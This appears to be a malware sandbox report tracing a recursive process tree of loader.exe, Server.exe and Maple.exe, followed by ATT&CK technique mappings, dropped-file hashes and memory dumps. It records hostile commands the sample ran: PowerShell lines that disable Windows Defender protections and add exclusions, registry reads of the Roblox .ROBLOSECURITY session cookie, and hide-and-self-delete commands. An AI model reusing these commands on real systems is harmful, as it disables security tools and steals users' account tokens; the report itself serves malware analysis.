        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5656
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        53⤵
        Checks computer location settings
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        54⤵
        System Location Discovery: System Language Discovery
        
        PID:5452
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        54⤵
        
        PID:5140
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        54⤵
        Checks computer location settings
        
        PID:824
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        55⤵
        System Location Discovery: System Language Discovery
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        55⤵
        
        PID:3160
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        55⤵
        Checks computer location settings
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        56⤵
        System Location Discovery: System Language Discovery
        
        PID:2532
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        56⤵
        Drops file in Drivers directory
        
        PID:3792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        57⤵
        
        PID:5940
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        57⤵
        Views/modifies file attributes
        
        PID:4136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        57⤵
        
        PID:5840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        57⤵
        
        PID:4624
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        57⤵
        
        PID:4720
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        57⤵
        
        PID:708
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        57⤵
        
        PID:528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        57⤵
        Detects videocard installed
        
        PID:5688
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        57⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4700
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        58⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3420
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        56⤵
        Checks computer location settings
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        57⤵
        System Location Discovery: System Language Discovery
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        57⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        57⤵
        Checks computer location settings
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        58⤵
        System Location Discovery: System Language Discovery
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        58⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        58⤵
        Checks computer location settings
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        59⤵
        System Location Discovery: System Language Discovery
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        59⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        59⤵
        Checks computer location settings
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        60⤵
        System Location Discovery: System Language Discovery
        
        PID:1184
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        60⤵
        Drops file in Drivers directory
        
        PID:5312
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        61⤵
        
        PID:1776
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        61⤵
        Views/modifies file attributes
        
        PID:3236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        61⤵
        
        PID:416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        60⤵
        Checks computer location settings
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        61⤵
        System Location Discovery: System Language Discovery
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        61⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        61⤵
        
        PID:5540

C:\Users\Admin\AppData\Roaming\Ondrive.exe
"C:\Users\Admin\AppData\Roaming\Ondrive.exe"
1⤵
- Executes dropped EXE
PID:1280

C:\Users\Admin\AppData\Roaming\Ondrive.exe
"C:\Users\Admin\AppData\Roaming\Ondrive.exe"
1⤵
PID:5648

C:\Users\Admin\AppData\Roaming\Ondrive.exe
"C:\Users\Admin\AppData\Roaming\Ondrive.exe"
1⤵
PID:5124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\server.exe.log

Filesize
319B

MD5
c03c52b5629516eb3271791af4a68fda

SHA1
21e3c5aa9d016632d558439b36749c14a54438a3

SHA256
52561d8d593a3fc07353a74c4e59650770e998ae08c1b168ba31f0456ba5d2b1

SHA512
186c267ae7079f9b0c9852daec79aea8ff4746309f2dd9ec3dbc50ebb0146bea2e566621a01fe6f4580f187850271b854bd8e5f20bb2715970386ac85326f0cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Maple.exe.log

Filesize
1KB

MD5
dcbdf62e96e679168e99bb26c3f28d37

SHA1
b4dd47ce9094a450cd6e03a2f1d61ea4c8b85208

SHA256
c44d43f12dedac8a011cf40417f28b4d7e0d961ac4503829f01891ce7212fa35

SHA512
679b07b35c90abdb029a202bb14c424d2497d1b8e99396d369629a066a3978e77c6257148a22c48abcbcb6370c722673d0cbb3d1fd33880fa32107d5a20869b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\loader.exe.log

Filesize
654B

MD5
11c6e74f0561678d2cf7fc075a6cc00c

SHA1
535ee79ba978554abcb98c566235805e7ea18490

SHA256
d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

SHA512
32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
020d1cbef5aeb22088c0faff8d76af4e

SHA1
93e7f27b8fb57cfea4ae330bedcace1a8ce7c014

SHA256
cb283829df7f7ca2f7f8072ed014bebb7d424581e8672a9fa5683f3674726bb0

SHA512
1046228ed9d08e5296c02409b5aa460e8280a633f7f2022ec7dc7c1e750522260006844bd5114ec713593bce1d10b8932963a8630e6707e76b45a0cb8c8ff53d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf3f1eed86db3bb2ae752b82cc013815

SHA1
265622fe29dde051820c524207ecc2979b5ac558

SHA256
818e35e14ebef6e6fc13dc4e2a5925134ad757fab83d4f0d2392c6ed846f2474

SHA512
05ebfde3bd9dde9ecba51333cb337cb615ba0984a6447a1bf2a65834f5eb9e4e6f3c516c70972641fb8ca2d73fc750e3aaa5e41b9d0e18288efc5b616c691ea2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
eb8a624c30b67c84f1fd927a09828437

SHA1
e4396a2ed3f7ebcd08dbd48d53e63b6ebbb0107e

SHA256
1e22ca2502416c09e65978b6bff91bdb74626bc478a7a583d8c41a1e8f79ac98

SHA512
08b12b0cad9b14663341f11f9e0790339e8fb133f70f6c26218aa230172c49bb54a7a1c7f20b15a017a103e0f9f7af83184e2ba58b2e4b4077aa2f3949181b60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0e4dcd708cd452442e22bcf623ba693

SHA1
737747ccf142293aee7fa5a0d484bd8dd384ed97

SHA256
53264f4639b26500eeaaf2d876e561a69c5734b9222be88aaebcff6800a00708

SHA512
929de452638146a652a9887fe343802f7035cd674663d895d04ea5bcdd2734c2105271cd73d76de55a1313916f588cbb52927a424b6ec01e04f5458e9b0e9d77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0e225e60e2eb7fd8818d4957e44f409c

SHA1
cfdceb8dd32485a818215e8f7abaaadf5e3fcb89

SHA256
44bb6c4ed470a068a973e17b3aa50ee7e837562cbe8b44564585461d03f8632d

SHA512
4b5e538ddb1968c4b088d89100a7b128805c6214ade709d87ae86206f6c2fdbef4c87e794ea2882ab7b11872e4941039c2e85a7fe73291e7f27374887a785938

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d899d290ce09da53ad2230dcc875ea45

SHA1
49f017df542b23ac4bba12ff4d06162ecab853a2

SHA256
1a202eea62ff84fc39acdbfead6c4b188b00fd19eb49d8701ffe99c1fd271847

SHA512
2875336d21c6bfa54b1f27f1157fcb0037f0b45c3eb5ecb6dd57cc543be90eb7eaa0a4cb30e46d7af01ee092eac30578db591678d8c2bdd79f344e433278776e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e22dd1cda88782a1f52f76e748ef957

SHA1
3231826619a06fa541e2bfb21da445bd7013b5ac

SHA256
73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

SHA512
75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
33287e49f6eaba2d1ef2051051f82854

SHA1
bebd7e3e83e10f3fad883a509ecc1e4f3c3d38a5

SHA256
77e1b16217bb47355474c6a65af74aa0d933e6842840c0cb1674818e21b27792

SHA512
c068f2c5051ba3c3b240ff4436c281754a9765adb2a80b0c6347a84ddfe0839ee937b736ea3979ba5724cfe17055fc501f0e3127e89052b883b889eb3318eb9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
71a2894e51646537b85d31d6f7014625

SHA1
07d6e020c72cd94b2cbae2d5b8ac238278a56636

SHA256
0c817dae2699f50343c50134d08b44ada35abca654cc805403624dbd4d4fb4f5

SHA512
a4838e5d8704aab2653eafab26ef43ecded6b06b76000c2061e5b0347a3164619399bf3453f1fce2646a70fd7fb429477d31dfa01542d30ca57efe9084059b46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dd003ff444ad7f5510a7921c64c80f1

SHA1
1f25434b32ab742ecf38b69fb1d3800f7f7b0cf3

SHA256
03502fe7eba8d8ea6783f561616e1ca0cfa8ab361db9ff36807da59b52233e4d

SHA512
6c7fb7cec92f1b18a76c35c9287a2691fd9caa841d3ae6d3450d213b55bd339ae4db7e47d22cfc59a9e1fedfc409849f1967026c71ad8c2067dd66b6596b2d77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
876febf24f7121997c91ff27fe1243f0

SHA1
d64b8df55e23b3d9e893a5def6506d464e7a2686

SHA256
dd376e9b33fb0bad4a35ef76c52cab42f2a34f3db9aa1a48b934579f9810923e

SHA512
06145c3e3639697ef0303682390fdb3c51b9e60fb3e69c135dfe352a9b4961fd2c0416f030bd2b6952b06067997bc8dfa4319784bff32b9aef596fa06dd9820e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
494de073067224860ddfa87f20c1fcd5

SHA1
139fe0d6cc741fdbb891b5e0df6e236fcdfdd7de

SHA256
5b67e54cbb8566db2c781ed86c2e026bef8e1c6e5b454c42872ffba7782a9579

SHA512
2457bb775ad7ce2b62b35f5cddfab1c1e1b16dcba83e38e7b5fb2e205048ffc5d220a29a9b0cfe218800d46fc3888480a0822877cf392aeadcf9287b784a390a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
71KB

MD5
f9b08bd21b40a938122b479095b7c70c

SHA1
eb925e3927b83c20d8d24bdab2e587c10d6ac8cd

SHA256
c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8

SHA512
fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\UTUKkIzeDqJ0BXU\Display\Display.png

Filesize
417KB

MD5
f9b89e7ac99b42eca35c96e4e1ff5ff1

SHA1
5b273ac5c70cee2def4a6821b78822d333f85be8

SHA256
225e51a7fa35038aacf48425dbb00aa4fc57cbb44a275a02a92e0ef5f409eed7

SHA512
88f217e12b1b3fbf1802926ad3d6251e7c658a4c65b3a80e86580905ac7da58db5d64daf7d58e23d475b7ed2b8ae7ca93da95a8dc746a0e82899048059ec20df

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ymrdm55i.bbm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\loader.exe

Filesize
5.4MB

MD5
916f7dea6831485387d70b0891455e65

SHA1
176e995cc2584d7c9703b2beee0994dcc4be91d5

SHA256
c47e49026afb1d2c8708f1e36510ad862eb288c7ac48e9c4bebfbd051475fbc2

SHA512
ba5c40e6416a53c88f5b5d7e0ce346956ef6bd0aebed355df8070ebb71dda78125945fe1cdca87caa29a2b5d98c437bafd228396a516c91f764256e54556f0e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\maple.exe

Filesize
227KB

MD5
550b445ad1a44d1f23f7155fae400db6

SHA1
cb006a53156285fdef3a0b33a4a08f534cd3bab7

SHA256
d223b3918e8bc3bab1d23fdc2e306be1c6587d3ab8f324fc377e37585387884e

SHA512
909f31f24672ffc5542ac42f344eb6020bcdfdfac9ac13d5672fe7ed22e686b06385d15709f1f83b576b1dade591ad40eb429ef076d07f4597235cd95a679fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Server.exe

Filesize
23KB

MD5
32fe01ccb93b0233503d0aaaa451f7b2

SHA1
58e5a63142150e8fb175dbb4dedea2ce405d7db0

SHA256
6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43

SHA512
76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

Download Submit
C:\Users\Admin\AppData\Roaming\conhost.exe

Filesize
37KB

MD5
b37dd1a1f0507baf993471ae1b7a314c

SHA1
9aff9d71492ffff8d51f8e8d67f5770755899882

SHA256
e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc

SHA512
ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/1540-962-0x000001A975680000-0x000001A975827000-memory.dmp

Filesize
1.7MB

Download
memory/2412-97-0x000002A364500000-0x000002A364522000-memory.dmp

Filesize
136KB

Download
memory/2444-396-0x000002B5110A0000-0x000002B51119F000-memory.dmp

Filesize
1020KB

Download
memory/2896-87-0x0000000000880000-0x0000000000890000-memory.dmp

Filesize
64KB

Download
memory/2980-56-0x0000000000180000-0x0000000000198000-memory.dmp

Filesize
96KB

Download
memory/3460-788-0x0000022D47460000-0x0000022D47607000-memory.dmp

Filesize
1.7MB

Download
memory/3704-26-0x00007FFA3BDE0000-0x00007FFA3C8A2000-memory.dmp

Filesize
10.8MB

Download
memory/3704-23-0x00007FFA3BDE3000-0x00007FFA3BDE5000-memory.dmp

Filesize
8KB

Download
memory/3704-68-0x00007FFA3BDE0000-0x00007FFA3C8A2000-memory.dmp

Filesize
10.8MB

Download
memory/3704-24-0x00000000005F0000-0x0000000000B50000-memory.dmp

Filesize
5.4MB

Download
memory/3792-1368-0x000002A2462B0000-0x000002A246457000-memory.dmp

Filesize
1.7MB

Download
memory/4180-904-0x000001F8CF8B0000-0x000001F8CFA57000-memory.dmp

Filesize
1.7MB

Download
memory/4260-1252-0x000001BC420C0000-0x000001BC42267000-memory.dmp

Filesize
1.7MB

Download
memory/4356-133-0x000002BF7FF90000-0x000002BF80006000-memory.dmp

Filesize
472KB

Download
memory/4356-134-0x000002BF7FF10000-0x000002BF7FF60000-memory.dmp

Filesize
320KB

Download
memory/4356-168-0x000002BF7FED0000-0x000002BF7FEDA000-memory.dmp

Filesize
40KB

Download
memory/4356-242-0x000002BF1A280000-0x000002BF1A37F000-memory.dmp

Filesize
1020KB

Download
memory/4356-55-0x000002BF7FBB0000-0x000002BF7FBF0000-memory.dmp

Filesize
256KB

Download
memory/4356-135-0x000002BF7FEE0000-0x000002BF7FEFE000-memory.dmp

Filesize
120KB

Download
memory/4356-169-0x000002BF80010000-0x000002BF80022000-memory.dmp

Filesize
72KB

Download
memory/4448-1310-0x0000015AA3680000-0x0000015AA3827000-memory.dmp

Filesize
1.7MB

Download
memory/4868-329-0x0000026BC5050000-0x0000026BC514F000-memory.dmp

Filesize
1020KB

Download
memory/4884-1136-0x00000177E4930000-0x00000177E4AD7000-memory.dmp

Filesize
1.7MB

Download
memory/4984-846-0x000001C776100000-0x000001C7762A7000-memory.dmp

Filesize
1.7MB

Download
memory/5068-1020-0x000002626D260000-0x000002626D407000-memory.dmp

Filesize
1.7MB

Download
memory/5172-1194-0x00000228FC690000-0x00000228FC837000-memory.dmp

Filesize
1.7MB

Download
memory/5204-445-0x0000026DB26A0000-0x0000026DB279F000-memory.dmp

Filesize
1020KB

Download
memory/5300-1078-0x0000021ADB790000-0x0000021ADB937000-memory.dmp

Filesize
1.7MB

Download